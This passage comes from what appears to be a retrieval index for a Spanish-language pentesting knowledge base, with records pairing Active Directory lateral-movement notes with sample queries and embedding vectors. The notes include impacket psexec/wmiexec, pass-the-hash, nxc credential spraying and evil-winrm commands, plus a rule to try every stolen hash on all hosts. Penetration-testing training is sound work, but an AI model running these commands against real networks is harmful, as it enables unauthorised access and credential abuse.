0.08315, -0.03184, 0.00387, 0.04642, 0.10026, 0.02144, -0.04853, 0.0628, -0.07608, -0.09922, -0.02281, -0.01135, 0.02726, -0.00045, 0.01874, 0.05564, 0.05025, 0.05916, 0.01297, -0.03051, -0.02433, 0.06038, 0.00895, 0.0246, 0.06655, -0.06338, -0.00852, -0.03166, -0.04691, 0.04771, 0.04906, 0.01238, -0.06046, -0.04391, -0.11729, 0.01628, 0.08366, -0.04276, -0.05059, -0.03171, 0.01083, -0.12408, 0.06597, -0.03501, -0.09362, -0.01429, 0.04627, 0.08436, -0.06126, 0.10841, -0.02017]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Movimiento lateral\n\n> Saltar de una mΓ‘quina a otra con credenciales/hashes obtenidos. Paso 5-6 de la cadena de Active Directory.", "indexar": "que tecnica sirve para saltar de una maquina a otra usando credenciales?", "v": [-0.01515, -0.06272, -0.27593, -0.05415, -0.07805, -0.14631, -0.09045, -0.10157, 0.04494, -0.07992, -0.10055, -0.00872, 0.02503, -0.00484, 0.06312, 0.04416, 0.04533, -0.03626, 0.16593, -0.05085, 0.02423, -0.12067, -0.0622, -0.13076, -0.12758, -0.05622, 0.02999, -0.10345, -0.16544, -0.05329, 0.01946, 0.13881, 0.07227, -0.0822, 0.03397, -0.05513, -0.09492, -0.04008, 0.05008, 0.13272, -0.11605, 0.02675, -0.0516, -0.0985, 0.14721, 0.03403, 0.06659, 0.05735, -0.09624, 0.05545, -0.01822, -0.02871, -0.01645, -0.05695, -0.11015, -0.10431, 0.11383, -0.01559, -0.00577, -0.07431, -0.03699, -0.06926, 0.00359, 0.0402, -0.05405, -0.05469, -0.0106, -0.09451, -0.04621, -0.00736, -0.07264, 0.03707, 0.05081, 0.04521, -0.01064, -0.06579, 0.00126, 0.06661, 0.1097, -0.03221, -0.04072, -0.01922, -0.03998, -0.0175, 0.01021, -0.06876, 0.028, -0.0716, 0.05031, -0.04148, 0.03447, 0.10181, 0.0022, -0.06498, 0.07852, 0.01242, 0.06508, 0.01828, 0.00607, 0.00623, 0.11774, -0.04682, -0.05371, 0.08428, -0.06966, 0.06059, 0.10555, -0.14309, -0.01942, -0.02073, 0.05205, 0.08746, -0.08087, -0.08163, -0.05866, 0.00471, -0.08194, -0.07009, -0.0727, 0.04817, 0.03985, -0.06886, 0.0891, -0.04152, -0.04351, -0.01147, 0.0015, 0.07923, -0.01571, -0.00945, -0.03635, -0.02407, -0.05626, 0.04503, -0.01375, -0.01148, 0.10845, -0.08987, -0.0893, 0.01916, 0.06475, 0.10088, -0.05836, -0.12218, 0.00038, 0.0513, 0.09155, -0.12691, 0.01481, -0.10122, 0.06531, 0.02412, -0.0034, 0.05653, 0.01651, -0.07987, 0.11734, -0.04173, -0.0981, 0.11951, -0.03737, 0.03508, -0.00928, 0.03229, -0.05436, -0.00285, -0.02192, -0.07414, 0.03512, 0.08968, 0.04336, -0.01069, -0.02868, 0.03855, 0.08384, 0.00159, -0.07623, 0.02394, -0.00076, -0.06421, -0.02325, -0.01339, 0.04347, -0.02281, -0.00985, -0.01925, -0.04187, -0.01017, 0.04585, 0.01461, 0.02951, -0.03686, -0.00877, -0.0088, -0.01459, -0.00225, 0.01951, -0.02157, 0.00974, -0.03403, -0.03319, 0.03542, -0.02613, -0.02762, 0.07193, 0.05473, 0.0353, -0.04023, -0.0339, 0.02131, 0.03593, -0.01262, 0.05268, -0.05021, -0.02807, 0.01306, 0.02831, -0.00911, -0.05301, -0.02243, 0.07365, -0.04683, -0.01246, 0.04389, -0.01261, 0.03068, -0.00696, -0.01294, 0.02317, 0.06387, -0.02129, 0.031, 0.02292, 0.0132, 0.0232, -0.05574, 0.03841, 0.00773, -0.06139, -0.07667, -0.00529, 0.00775, -0.01436, -0.05593, -0.05335, 0.02087, -0.06423, -0.00873, 0.03427, -0.01403, -0.00105, 0.00653, 0.02162, -0.006, 0.02374, -0.00172]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Movimiento lateral\n\n> Saltar de una mΓ‘quina a otra con credenciales/hashes obtenidos. Paso 5-6 de la cadena de Active Directory.", "indexar": "como muevo un usuario entre diferentes dominios de Active Directory?", "v": [0.02207, 0.01326, -0.04503, -0.03273, -0.03047, 0.06375, 0.0055, -0.0655, -0.13932, -0.02353, 0.09322, -0.17141, -0.1023, -0.16817, 0.00564, -0.1343, 0.28953, -0.03533, -0.10355, -0.07706, -0.02021, -0.03301, 0.00462, 0.08458, 0.11313, -0.05371, -0.02519, -0.1057, 0.02919, 0.11475, 0.08546, 0.02906, 0.03655, -0.08299, 0.0124, -0.16377, -0.03079, 0.02582, 0.0728, 0.13898, -0.01131, -0.01162, -0.20784, 0.05789, -0.08235, 0.07292, -0.10717, -0.14232, 0.05405, 0.0248, -0.03915, -0.03885, -0.13126, -0.01203, 0.09149, -0.01306, 0.1267, -0.07759, 0.04289, -0.10551, -0.09287, -0.06099, 0.01361, 0.01579, -0.05861, -0.10417, 0.06283, -0.02695, -0.06336, 0.05803, 0.02389, 0.04681, 0.02607, 0.0829, 0.12317, -0.01127, 0.09047, -0.07823, -0.03161, 0.02631, 0.07979, -0.01963, -0.01705, 0.02087, -0.15423, -0.18259, -0.00527, -0.08216, 0.01648, 0.0142, 0.11281, 0.06249, -0.06193, 0.01867, 0.01384, 0.01223, 0.03283, 0.01596, 0.0266, -0.02063, 0.01184, 0.11538, -0.06709, 0.10574, 0.04583, 0.07849, -0.02265, -0.02788, -0.02633, 0.02176, -0.00502, -0.07431, 0.02572, -0.10622, -0.00752, 0.16919, -0.07309, -0.0825, 0.02268, -0.03254, -0.08307, -0.05989, 0.08533, 0.02188, 0.01779, -0.03288, 0.00845, 0.00867, -0.0326, -0.03229, -0.00872, 0.05329, 0.00266, -0.01378, -0.03734, 0.07133, 0.02349, 0.02458, 0.00177, -0.06458, -0.01125, 0.01544, 0.00954, 0.05493, 0.0205, -0.03812, 0.02265, -0.04479, -0.0531, 0.02059, -0.05273, -0.02194, -0.02716, 0.02433, 0.02596, 0.0777, -0.07467, -0.04043, -0.0025, 0.03481, -0.01144, 0.00263, -0.0164, -0.03734, -0.00722, -0.04259, -0.08144, -0.05352, 0.0405, 0.09316, -0.06011, 0.06535, -0.04263, -0.03299, -0.03463, 0.00271, -0.01589, 0.01964, 0.04608, -0.00739, -0.02581, -0.04087, -0.03424, 0.04609, -0.033, 0.02779, -0.00865, -0.01489, -0.00266, 0.03495, 0.05979, 0.08904, -0.02704, -0.01548, -0.03863, -0.07364, 0.02849, -0.0147, -0.00783, -0.03961, -0.01433, 0.02521, 0.01566, -0.0189, -0.01652, -0.00027, -0.03068, 0.08165, 0.0501, -0.04453, -0.03242, -0.0204, 0.0712, 0.00282, -0.03782, 0.01396, -0.00404, -0.02545, -0.04373, -0.05199, -0.0383, 0.04959, -0.00815, -0.0764, 0.02418, 0.04682, 0.05122, -0.02755, 0.0242, 0.04429, -0.03619, -0.00532, 0.00869, -0.02777, 0.06219, 0.04778, 0.03227, -0.0231, -0.01262, -0.02132, -0.02622, 0.03953, 0.04168, 0.00882, -0.02933, -0.05463, -0.07295, 0.04013, -0.03165, -0.03917, 0.01563, -0.00327, 0.02309, -0.04463, -0.0478, -0.02561]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Movimiento lateral\n\n> Saltar de una mΓ‘quina a otra con credenciales/hashes obtenidos. Paso 5-6 de la cadena de Active Directory.", "indexar": "cual es el paso siguiente tras obtener los hashes en Active Directory?", "v": [-0.07078, 0.06126, -0.04684, -0.01206, 0.02552, -0.08896, -0.03161, -0.05263, -0.13202, 0.16953, -0.07206, -0.08197, -0.18072, 0.00026, 0.10548, -0.00918, 0.13899, 0.03632, -0.08807, -0.03576, -0.06432, 0.0606, -0.18099, 0.06087, 0.09165, 0.00929, -0.08654, 0.05313, -0.19641, -0.05876, 0.07806, -0.02799, -0.06504, 0.03109, 0.01595, 0.01034, -0.07423, 0.06726, 0.09678, 0.06188, -0.11411, 0.05397, -0.12978, 0.10761, 0.07466, -0.0367, -0.00845, -0.05005, 0.04651, -0.01036, 0.05503, 0.0703, -0.17083, -0.05014, 0.03205, -0.09009, 0.00224, -0.01744, -0.13219, -0.14737, -0.02576, -0.03062, -0.03242, -0.06394, -0.13305, -0.15618, 0.14841, -0.12074, -0.11837, 0.04922, 0.04808, 0.10859, 0.03078, 0.13604, -0.00937, -0.00653, 0.05641, -0.04055, -0.11039, 0.14359, 0.11067, -0.05434, 0.08922, 0.00939, -0.11143, -0.09335, 0.01887, -0.07521, 0.07466, 0.03721, 0.04346, 0.06393, -0.02527, 0.02813, -0.02471, 0.03212, 0.00935, 0.06091, -0.00166, -0.00595, -0.10175, -0.03686, -0.0699, 0.16595, -0.01007, 0.05444, 0.02242, 0.08045, -0.04898, 0.05172, 0.02919, -0.03826, 0.03649, -0.04579, 0.07173, 0.08944, -0.08207, -0.0439, -0.04487, 0.07382, -0.0919, -0.00509, 0.06325, 0.03706, 0.05148, 0.02156, -0.01688, -0.02744, 0.01179, 0.02975, 0.05791, 0.06448, -0.0326, -0.11026, -0.00572, -0.01248, 0.03605, 0.06335, 0.01083, -0.11954, -0.00566, 0.00471, 0.0307, -0.00541, 0.02687, -0.04983, -0.00175, 0.04271, -0.05435, 0.02405, -0.03688, 0.02318, 0.04066, -4e-05, 0.01071, 0.03693, -0.01608, -0.03374, -0.03585, 0.02593, -0.02203, -0.00724, -0.03876, 0.01338, 0.01089, -0.00063, -0.07494, -0.03098, 0.03405, 0.05187, -0.02359, -0.01848, -0.03667, -0.1033, 0.00631, -0.01692, -0.01703, 0.01615, 0.05947, -0.01156, 0.02731, 0.03236, -0.01205, 0.04855, -0.00695, 0.00876, 0.00287, 0.01905, -0.02577, 0.01246, 0.00715, 0.05339, -0.06072, 0.00237, -0.01625, -0.03633, 0.02934, -0.00882, 0.01704, -0.10042, 0.01835, 0.03571, 0.02064, -0.01761, 0.0438, -0.01081, -0.05725, 0.0284, 0.01418, 0.02664, -0.02072, 0.03493, 0.09278, 0.05715, -0.08999, 0.03924, -0.00656, -0.00748, -0.06057, 0.03838, 0.0031, 0.07702, 0.00888, -0.06732, -0.00365, 0.00048, 0.01199, 0.05102, 0.00603, 0.06796, -0.03295, -0.02162, 0.00399, 0.01176, 0.01298, 0.03727, 0.00512, 0.00525, -0.0152, -0.04796, 0.07869, 0.0712, 0.01839, 0.03513, -0.05029, 0.02175, -0.03132, 0.08113, -0.02799, -0.04282, 0.0228, -0.01457, 0.01714, -0.00881, -0.00344, -0.01854]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Con quΓ© saltas\n```bash\nimpacket-psexec dominio/user:pass@10.10.10.20 # shell SYSTEM\nimpacket-wmiexec dominio/user:pass@10.10.10.20 # sin tocar disco\nimpacket-psexec -hashes :NTLMHASH user@10.10.10.20 # Pass-the-Hash\nnxc smb 10.10.10.0/24 -u user -p pass # ΒΏdΓ³nde valen estas creds?\nxfreerdp /u:user /p:pass /v:10.10.10.20 # RDP si hay GUI\nevil-winrm -i 10.10.10.20 -u user -p pass # WinRM (5985)\n```", "indexar": "con quΓ© puedo ejecutar comandos remotos en Windows usando credenciales de administrador?", "v": [0.09611, 0.09475, -0.06407, -0.13621, 0.10256, 0.02719, 0.09758, -0.0197, -0.10454, -0.10195, -0.11571, -0.05803, 0.02172, -0.05604, 0.06352, 0.03988, 0.12823, 0.03465, -0.02261, -0.02063, 0.07348, -0.1522, 0.03446, 0.05798, -0.00842, 0.03202, 0.09567, 0.01385, -0.0306, -0.09947, 0.02515, 0.01515, 0.01751, -0.02802, -0.03445, 0.08305, -0.13503, 0.11341, -0.02312, 0.17229, 0.01247, 0.08664, -0.16535, -0.01387, 0.09201, -0.0494, 0.05889, -0.09334, 0.07447, -0.08903, -0.03309, -0.11501, -0.09431, -0.07382, 0.023, -0.0149, 0.2153, -0.08154, 0.03736, 0.00796, -0.03664, -0.00498, 0.05813, 0.13111, -0.01428, -0.06718, -0.00692, -0.13194, -0.05028, 0.09611, -0.1356, 0.03004, 0.01137, 0.07261, 0.05511, 0.02725, -0.07728, -0.00293, 0.14295, -0.03601, -0.01664, -0.00072, -0.06735, -0.05632, -0.0838, -0.18632, -0.10031, -0.05202, -0.02753, -0.07506, 0.08434, -0.06604, -0.0295, 0.01033, 0.06377, 0.03856, 0.02698, 0.01385, -0.01898, 0.05788, -0.04048, -0.0227, -0.04512, 0.17339, -0.01956, 0.08007, 0.06317, -0.07928, 0.00362, -0.05008, 0.02866, -0.00684, -0.04012, -0.06071, -0.05036, -0.02417, -0.05779, -0.08423, 0.02121, 0.00527, -0.10443, -0.01577, 0.02837, 0.05224, 0.05044, -0.03404, -0.0617, 0.11319, -0.02757, 0.01612, -0.03525, -0.04736, 0.01723, -0.08874, -0.07597, 0.10269, -0.04427, -0.04499, -0.02192, -0.13172, 0.02582, 0.05541, 0.05386, 0.01156, 0.09923, 0.02647, 0.02821, -0.0324, -0.00878, -0.01419, 0.0974, 0.01573, -0.06483, 0.06531, -0.0637, -0.0317, 0.0037, -0.00823, -0.01497, 0.06431, -0.01002, -0.01191, -0.0316, 0.01642, 0.01618, -0.04668, -0.01458, -0.02442, 0.04056, 0.04521, -0.0884, 0.08586, -0.03103, -0.02675, 0.01777, -0.03009, 0.00358, -0.01088, -0.01039, -0.02152, -0.05062, 0.06869, -0.01671, -0.02928, 0.00092, 0.02068, -0.04107, 0.06712, -0.0391, 0.01878, -0.00389, 0.0313, 0.02317, -0.04818, 0.03003, -0.02027, -0.00157, -0.02222, -0.06541, -0.01971, -0.07135, -0.0111, 0.03427, -0.05798, 0.11833, 0.015, -0.0356, 0.1121, 0.03348, 0.08633, 0.02359, -0.03494, 0.07078, -0.01632, -0.06221, -0.06366, 0.0329, -0.02017, -0.01487, -0.03725, 0.01353, 0.01604, 0.06233, -0.02847, 0.05124, -0.01726, -0.01942, -0.01041, 0.02068, 0.01717, -0.01964, 0.03803, -0.00819, -0.03285, 0.04395, -0.01314, 0.00858, -0.04796, -0.00188, -0.00557, -0.06055, 0.0635, -0.00963, -0.08528, -0.07741, -0.06164, -0.09928, 0.03738, -0.03614, -0.0374, 0.00171, 0.01377, 0.03909, -0.04302, -0.04494, -3e-05]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Con quΓ© saltas\n```bash\nimpacket-psexec dominio/user:pass@10.10.10.20 # shell SYSTEM\nimpacket-wmiexec dominio/user:pass@10.10.10.20 # sin tocar disco\nimpacket-psexec -hashes :NTLMHASH user@10.10.10.20 # Pass-the-Hash\nnxc smb 10.10.10.0/24 -u user -p pass # ΒΏdΓ³nde valen estas creds?\nxfreerdp /u:user /p:pass /v:10.10.10.20 # RDP si hay GUI\nevil-winrm -i 10.10.10.20 -u user -p pass # WinRM (5985)\n```", "indexar": "hay alguna herramienta para acceder a una mΓ‘quina vΓ­a RDP si no tengo permisos de ejecuciΓ³n de disco?", "v": [-0.07668, 0.01103, -0.21989, -0.15586, 0.05567, 0.00099, -0.09513, 0.02852, -0.10791, -0.0721, 0.03735, -0.09364, 0.03868, -0.17355, 0.11336, -0.0783, 0.05947, 0.06427, -0.03013, -0.038, 0.02597, 0.00937, -0.09624, 0.09141, 0.05834, -0.01433, 0.01667, 0.00438, -0.29431, -0.00925, 0.14899, 0.01986, 0.01635, -0.15405, -0.02423, -0.13199, 0.03855, 0.0251, 0.14667, -0.01568, 0.04243, 0.02616, -0.08565, 0.07387, 0.048, -0.08084, 0.00743, 0.02132, -0.04206, 0.01379, -0.02049, -0.06099, -0.14366, -0.08125, 0.00296, -0.12512, 0.20363, -0.0164, 0.07694, 0.00827, -0.04227, 0.03394, -0.04605, 0.06224, 0.03362, 0.03019, 0.08518, -0.13795, -0.00357, 0.11717, -0.11922, 0.01984, 0.0997, -0.00662, 0.05853, -0.12331, -0.02544, -0.0204, 0.07772, 0.02968, 0.04428, -0.02877, -0.09253, -0.03439, -0.13258, -0.09528, 0.10333, -0.05099, 0.0946, -0.04114, -0.06724, 0.05687, -0.04324, 0.03722, 0.05105, -0.03919, 0.01897, 0.06814, -0.02498, 0.00869, 0.14716, 0.05947, -0.02365, 0.02668, -0.04095, 0.0169, 0.06175, -0.04361, -0.0015, 0.07346, 0.01849, 0.10513, -0.02041, -0.0505, -0.04518, 0.01329, -0.03811, -0.04817, -0.08929, -0.03385, 0.0029, 0.0521, -0.04803, -0.01638, 0.01665, -0.05421, -0.02058, 0.06668, -0.09394, -0.06914, 0.03966, -0.03891, -0.02471, 0.03973, -0.01359, 0.03795, -0.00899, -0.05284, -0.04104, -0.10657, 0.06389, 0.06499, -0.03734, -0.0373, -0.0027, 0.0139, -0.02487, -0.07666, -0.01722, -0.02464, 0.08286, -0.04224, -0.0458, 0.04003, -0.01337, 0.04198, -0.07281, 0.00815, -0.03319, 0.03576, -0.00699, -0.00376, -0.09829, 0.06519, -0.03466, 0.04255, 0.00824, 0.00026, 0.02507, 0.00704, -0.08238, 0.00267, 0.07935, -0.0074, 0.01996, -0.09865, -0.06891, -0.03643, 0.04321, 0.01075, -0.0207, -0.02908, -0.058, -0.09108, 0.01431, -0.02652, 0.03207, -0.04863, 0.04769, -0.01292, 0.04913, 0.02196, -0.00904, -0.08031, 0.0262, -0.0017, -0.03104, -0.0336, 0.00805, 0.01598, -0.07052, -0.03304, -0.05442, -0.06166, 0.01164, 0.01667, -0.02148, 0.0194, -0.0299, 0.00106, 0.07833, -0.01665, 0.02241, -0.03321, 0.01726, -0.01339, -0.00224, 0.07869, 0.02911, 0.00026, 0.02821, 0.00061, 0.04282, 0.00751, -0.01672, 0.00603, 0.07942, 0.01956, 0.08807, 0.01717, 0.01819, -0.01479, 0.00853, 0.00761, 0.00517, 0.00426, 0.0293, 0.01527, -0.07685, -0.03827, 0.04649, 0.01446, 0.04855, -0.02054, -0.01388, 0.01055, -0.02895, -0.04661, -0.03233, -0.07139, 0.02745, 0.01456, 0.00907, -0.02307, 0.03571, 0.00765]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Con quΓ© saltas\n```bash\nimpacket-psexec dominio/user:pass@10.10.10.20 # shell SYSTEM\nimpacket-wmiexec dominio/user:pass@10.10.10.20 # sin tocar disco\nimpacket-psexec -hashes :NTLMHASH user@10.10.10.20 # Pass-the-Hash\nnxc smb 10.10.10.0/24 -u user -p pass # ΒΏdΓ³nde valen estas creds?\nxfreerdp /u:user /p:pass /v:10.10.10.20 # RDP si hay GUI\nevil-winrm -i 10.10.10.20 -u user -p pass # WinRM (5985)\n```", "indexar": "quΓ© alternativas libre hay para realizar ataques de Pass-the-Hash o WMI en Windows?", "v": [-0.15187, 0.09979, -0.08965, -0.06073, -0.09376, 0.00509, -0.06798, -0.07641, -0.03769, -0.02838, 0.05433, -0.13035, -0.01404, 0.02029, 0.10587, 0.0501, 0.05833, -0.0441, 0.01938, 0.00576, -0.05166, 0.01044, -0.0718, 0.06679, -0.03918, 0.01238, -0.03825, 0.04787, -0.23715, -0.04137, 0.03589, -0.05209, -0.07026, 0.04335, -0.01457, 0.07603, -0.05344, 0.13899, 0.20169, 0.03247, 0.10673, 0.03887, -0.16969, 0.06057, 0.11533, -0.12055, 0.09622, -0.0518, 0.18479, -0.03951, 0.00964, 0.03452, -0.08691, -0.02726, 0.07295, -0.12989, 0.05826, -0.05706, -0.0781, 0.01404, -0.07059, 0.13068, -0.02068, -0.04851, 0.1325, -0.06585, -0.02752, -0.0291, -0.0534, 0.22186, 0.0145, -0.02866, 0.03696, 0.03521, 0.04667, 0.10853, -0.0141, -0.03647, 0.08932, -0.00441, 0.03229, -0.00513, 0.02107, -0.04216, -0.07083, -0.07933, 0.00103, -0.10354, 0.00467, -0.00617, 0.07817, -0.01158, -0.03312, 0.04261, -0.04451, -0.06311, -0.08289, -0.04471, -0.02616, 0.07376, -0.03564, -0.1473, -0.09651, 0.07577, -0.0389, 0.06703, -0.00792, -0.02236, -0.04763, -0.05789, -0.01485, -0.00331, -0.08622, -0.07669, -0.00741, -0.08323, -0.01686, -0.03166, 0.01411, 0.057, -0.1151, 0.04422, -0.05325, -0.01722, -0.02741, 0.02383, -0.01235, 0.08334, -0.12716, 0.00888, 0.02843, 0.00304, -0.01849, -0.07939, -0.08473, 0.04839, 0.06326, -0.08184, 0.03301, -0.02975, 0.05899, 0.0738, 0.01885, 0.03771, 0.07752, -0.01167, 0.04518, 0.04408, -0.1161, -0.0515, -0.00697, -0.00011, 0.03523, 0.01296, -0.04833, 0.01616, -0.00501, 0.02712, -0.03749, 0.10608, 0.01056, -0.00731, -0.09873, -0.01443, -0.00719, 0.05356, 0.0462, -0.01392, 0.0159, -0.01509, -0.00506, 0.11766, 0.0053, -0.07075, 0.07844, -0.04932, 0.05036, -0.06849, 0.02054, -0.06627, -0.05128, -0.06152, -0.02425, -0.02241, -0.06002, -0.02507, 0.01884, 0.03562, 0.02826, 0.02601, -0.04915, 0.01567, -0.00577, 0.00548, 0.00421, -0.0091, -0.04315, -0.06919, 0.00805, -0.01833, -0.01909, -0.00421, -0.07569, -0.04787, 0.08047, 0.05054, -0.06692, 0.04788, 0.02377, 0.09918, 0.02725, -0.02642, 0.06284, -0.06437, -0.0555, -0.02253, 0.08101, -0.01353, -0.01526, 0.00937, 0.04743, 0.05469, 0.03773, 0.02044, -0.02657, -0.00015, -0.06224, -0.03416, -0.01359, 0.0284, 0.0701, 0.01842, 0.02326, -0.01431, 0.02779, 0.01629, 0.0086, -0.02654, -0.04972, -0.0143, 0.01048, 0.04217, -0.00302, -0.07488, -0.0358, -0.03442, -0.09077, 0.01206, -0.01541, -0.07504, -0.032, 0.02486, 0.0187, 0.00198, -0.01556, 0.01968]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Regla clave\n**Reutiliza credenciales**: cada pass/hash que pillas β†’ pruΓ©balo contra **todos** los hosts y servicios (MetodologΓ­a OSCP).", "indexar": "ΒΏQuΓ© herramienta sirve para reutilizar credenciales en mΓΊltiples servidores?", "v": [-0.23084, 0.01687, -0.16031, -0.08761, 0.09826, -0.13122, -0.00927, -0.14424, 0.03045, -0.16652, -0.12261, 0.00055, 0.05145, -0.1226, 0.0821, 0.13979, 0.06487, -0.11139, 0.04733, 0.02142, 0.03893, -0.04388, -0.05568, 0.00392, -0.21136, 0.04934, 0.07462, -0.10139, -0.10123, 0.07356, -0.03035, 0.0228, -0.00194, -0.10921, -0.06232, -0.02291, -0.10588, 0.16066, -0.10466, 0.04892, 0.05821, 0.06523, -0.14625, -0.01841, 0.05405, 0.0653, -0.04276, -0.01382, 0.0102, 0.09225, -0.08992, -0.15586, -0.10123, -0.01112, 0.00177, -0.06043, 0.06687, -0.08, -0.01516, -0.07551, -0.14379, 0.00458, -0.06106, -0.01383, 0.01489, -0.11247, -0.04404, -0.09625, -0.0989, 0.04185, -0.08509, 0.01496, 0.08271, -0.04721, -0.0742, 0.04169, -0.01018, -0.03545, 0.07229, 0.08997, 0.07285, -0.00728, -0.04853, 0.00799, -0.02024, -0.07901, 0.04975, -0.01295, 0.00753, -0.00543, -0.04308, 0.09793, -0.04904, 0.09674, -0.02052, 0.03292, 0.05859, -0.03403, -0.01883, 0.03063, 0.12637, -0.08248, -0.01001, 0.03934, -0.07401, 0.07249, -0.00228, -0.06461, -0.01739, -0.03897, 0.11429, -0.04127, -0.03803, 0.02983, -0.03039, 0.03319, 9e-05, -0.06262, 0.01489, 0.00449, 0.02872, 0.0171, 0.04537, -0.00127, 0.04102, -0.01464, -0.00907, 0.03942, 0.00536, -0.10029, -0.00129, -0.01825, -0.1061, 0.02762, -0.03087, -0.07267, 0.12357, -0.12364, -0.09716, -0.02216, 0.03094, 0.04694, -0.06218, -0.07784, 0.00969, -0.02244, 0.11623, -0.05706, -0.00524, -0.041, 0.03241, -0.00715, -0.00694, -0.004, -0.04658, -0.01742, 0.00345, -0.01296, -0.15173, 0.04408, -0.06524, -0.05545, 0.10057, 0.08571, 0.01503, -0.0176, 0.02189, 0.01307, 0.06939, 0.05416, 0.03606, 0.0008, 0.00706, -0.04257, -0.02412, -0.02726, -0.10022, 0.01564, 0.01838, -0.08326, 0.0103, 0.04373, -0.0545, 0.00541, 0.0027, -0.05529, -0.00775, 0.00682, -0.0138, 0.01068, 0.01799, -0.01204, -0.02179, -0.0542, 0.05459, -0.02571, -0.00882, -0.07728, -0.01545, -0.02779, -0.00778, 0.00389, -0.05583, -0.03086, 0.05172, 0.08846, -0.02215, 0.01532, 0.00138, 0.04787, -0.02721, -0.01838, 0.10573, -0.02797, -0.04433, -0.0193, 0.03051, -0.01687, -0.01264, -0.04587, 0.02101, -0.01101, 0.00895, -0.00124, 0.0014, 0.02994, 0.03534, -0.02213, 0.00867, 0.00747, 0.01246, 0.03376, -0.00994, -0.02337, -0.02338, -0.08042, 0.04704, -0.00809, -0.00079, -0.08931, 0.00737, 0.03476, -0.0258, -0.01295, -0.0291, -0.0296, 0.00303, -0.00784, -0.03394, -0.0355, -0.02857, 0.01227, 0.01252, -0.01397, -0.0122, -0.03394]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Regla clave\n**Reutiliza credenciales**: cada pass/hash que pillas β†’ pruΓ©balo contra **todos** los hosts y servicios (MetodologΓ­a OSCP).", "indexar": "Con quΓ© puedo probar un usuario y contraseΓ±a en todos mis hosts de la vez?", "v": [-0.00864, 0.12906, -0.15339, -0.11087, -0.00894, -0.00039, -0.00667, -0.06186, -0.06818, -0.20394, -0.02792, 0.03532, 0.00226, 0.03261, -0.05619, -0.003, 0.18617, 0.08366, 0.04628, 0.0467, 0.04403, -0.08313, -0.04599, -0.00933, 0.01858, -0.08326, 0.09789, -0.03252, -0.02937, -0.08641, -0.04998, -0.08094, 0.01552, 0.03769, -0.01289, 0.12395, 0.03042, 0.06339, 0.0862, 0.10695, 0.10665, 0.03228, -0.08272, 0.10688, -0.0414, 0.05876, -0.06825, -0.05301, -0.01444, 0.01833, -0.07236, -0.17487, -0.11302, -0.05728, -0.01062, -0.09428, 0.09567, -0.0707, 0.06897, 0.01581, -0.07251, -0.00455, 0.07106, 0.11381, -0.04, -0.10652, -0.03404, 0.00234, -0.13143, 0.08888, -0.00894, 0.01859, -0.06715, -0.04012, 0.053, 0.05052, 0.00951, 0.00326, 0.06725, 0.06769, -0.08975, -0.02302, -0.0219, -0.0198, -0.09653, -0.03442, 0.04505, -0.06893, 0.0471, -0.07284, 0.13594, -0.01495, 0.04688, 0.02642, 0.00707, -0.09087, 0.09388, -0.00579, -0.02268, -0.07348, 0.02126, 0.07068, -0.04978, 0.1923, -0.05551, 0.00475, 0.01953, -0.03411, 0.04483, -0.13941, 0.03781, -0.05681, -0.1746, -0.0519, -0.03045, -0.00582, -0.08293, -0.1192, -0.02389, -0.02711, -0.08696, -0.08354, 0.04113, 0.01329, 0.0962, 0.0603, 0.00037, 0.07804, 0.00249, -0.02062, -0.03344, 0.02485, -0.01929, 0.04394, 0.0324, 0.05077, -0.03647, -0.10805, -0.08206, 0.00714, 0.0194, 0.06216, 0.02098, -0.06288, 0.07374, 0.0236, -0.0196, -0.0681, -0.13578, 0.02805, -0.02873, 0.01541, 0.03121, 0.025, -0.0673, 0.03449, -0.00345, -0.1156, 0.02774, 0.10908, -0.05747, -0.03844, -0.04993, 0.01155, -0.03613, -0.08413, -0.03218, -0.02425, 0.03905, 0.02918, -0.02608, 0.08995, -0.02526, -0.03715, 0.04558, -0.02622, -0.00669, -0.06543, -0.00272, -0.0828, -0.00893, -0.03285, -0.02008, -0.01781, 0.00086, -0.07051, 0.04325, 0.02092, 0.03058, -0.00125, 0.03871, 0.05429, -0.02417, 0.05354, -0.01683, -0.06955, -0.02701, -0.04194, -0.01621, -0.07705, -0.00557, -0.01696, -0.01627, -0.01664, 0.04835, -0.0139, -0.08251, 0.00992, 0.00952, -0.00444, 0.07285, -0.02588, 0.08478, -0.05243, -0.0563, -0.03375, 0.02568, 0.05873, -0.043, -0.01006, 0.05265, 0.09263, 0.03429, 0.02893, 0.00665, 0.00895, 0.01086, 0.01789, 0.03222, 0.00598, -0.02809, 0.0398, -0.05418, -0.00728, 0.08247, 0.03202, -0.02561, -0.0603, -0.0821, -0.05525, -0.04884, 0.06217, 0.0024, -0.11291, -0.0237, -0.0259, -0.09001, 0.0459, -0.03655, -0.04271, -0.06651, -0.00418, 0.06404, -0.06498, 0.02495, 0.0107]} -{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Regla 